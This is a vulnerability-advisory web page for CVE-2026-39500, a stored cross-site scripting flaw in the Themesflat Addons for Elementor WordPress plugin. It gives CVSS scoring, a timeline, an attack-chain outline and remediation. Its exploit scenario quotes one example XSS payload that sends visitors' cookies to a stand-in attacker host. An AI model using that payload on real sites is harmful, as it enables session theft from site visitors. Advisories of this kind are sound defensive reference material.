Skip to main content

Themesflat Addons For Elementor CVE-2026-39500

| EUVD-2026-20165 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-08 Patchstack GHSA-9w47-rc65-v592
XSS Themesflat Addons For Elementor Elementor
6.5
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

4
Analysis Generated
Apr 15, 2026 - 12:40 vuln.today
CVSS changed
Apr 13, 2026 - 20:22 NVD
6.5 (MEDIUM)
EUVD ID Assigned
Apr 08, 2026 - 08:45 euvd
EUVD-2026-20165
CVE Published
Apr 08, 2026 - 08:30 nvd
N/A

DescriptionCVE.org

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themesflat themesflat-addons-for-elementor themesflat-addons-for-elementor allows Stored XSS.This issue affects themesflat-addons-for-elementor: from n/a through <= 2.3.2.

AnalysisAI

Stored Cross-Site Scripting (XSS) in Themesflat Addons for Elementor up to version 2.3.2 allows authenticated users with low privileges to inject malicious scripts that execute in the context of site visitors' browsers. An attacker with contributor-level access or higher can craft input fields within the plugin's admin interface to persistently store JavaScript code, which then executes whenever other users (including administrators) view the affected content. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate as contributor
Delivery
Access plugin admin panel
Exploit
Inject XSS payload in widget field
Execution
Store malicious input
Persist
Victim views page
Impact
JavaScript executes in victim browser
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to possess a WordPress user account with contributor role or higher (to access the Themesflat addon plugin configuration interface) and the ability to modify plugin widget settings or fields that accept user input without sanitization. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is notably lower than the CVSS 6.5 score suggests, as evidenced by the extremely low EPSS score of 0.03% (8th percentile). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A WordPress site administrator creates a contributor-level account for a temporary team member. That contributor logs into the WordPress dashboard, navigates to a Themesflat addon widget configuration panel, and enters JavaScript code (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>) into an unprotected input field. …
Remediation Update Themesflat Addons for Elementor to a version newer than 2.3.2 when available. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-39500 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy